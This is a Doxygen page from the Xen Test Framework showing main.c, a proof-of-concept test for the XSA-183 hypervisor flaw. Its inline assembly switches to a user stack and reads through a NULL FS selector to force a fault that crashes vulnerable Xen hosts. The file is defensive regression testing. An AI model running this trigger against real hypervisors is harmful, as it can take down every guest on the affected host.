Xen Test Framework
main.c
Go to the documentation of this file.
1 
38 #include <xtf.h>
39 
40 const char test_title[] = "XSA-183 PoC";
41 
42 void test_main(void)
43 {
44  unsigned long curr_stk, discard;
45 
46  /* Load NULL selector to guarantee a fault. */
47  write_fs(0);
48 
49  asm volatile ("pushf;" /* Set AC to whitelist user */
50  "orl $%c[AC], (%%esp);" /* accesses. Avoids crashes if */
51  "popf;" /* Xen leaks SMAP into guest. */
52  /* context. */
53 
54  "mov %%esp, %[curr_stk];" /* Record the current stack. */
55  "mov %[user_stk], %%esp;" /* Switch to the user stack. */
56 
57  "1: mov %%fs:0, %[tmp]; 2:" /* Read from NULL using a NULL */
58  _ASM_EXTABLE(1b, 2b) /* selector to cause a fault. */
59 
60  "mov %[curr_stk], %%esp;" /* Restore the previous stack. */
61  : [curr_stk] "=&r" (curr_stk),
62  [tmp] "=r" (discard)
63  : [user_stk] "r" (&user_stack[PAGE_SIZE]),
64  [AC] "i" (X86_EFLAGS_AC));
65 
66  /*
67  * If Xen hasn't crashed by this point, we are either running on hardware
68  * without SMAP, or with SMAP disabled, or Xen has been patched. Either
69  * way, Xen isn't vulnerable to XSA-183 in its current configuration.
70  */
71  xtf_success("Xen is not vulnerable to XSA-183\n");
72 }
73 
74 /*
75  * Local variables:
76  * mode: C
77  * c-file-style: "BSD"
78  * c-basic-offset: 4
79  * tab-width: 4
80  * indent-tabs-mode: nil
81  * End:
82  */
X86_EFLAGS_AC
#define X86_EFLAGS_AC
Definition: processor.h:21
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
user_stack
uint8_t user_stack[PAGE_SIZE]
Definition: setup.c:22
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
_ASM_EXTABLE
#define _ASM_EXTABLE(fault, fixup)
Create an exception table entry.
Definition: extable.h:50
write_fs
static void write_fs(unsigned int fs)
Definition: lib.h:196
Generated by   doxygen 1.8.13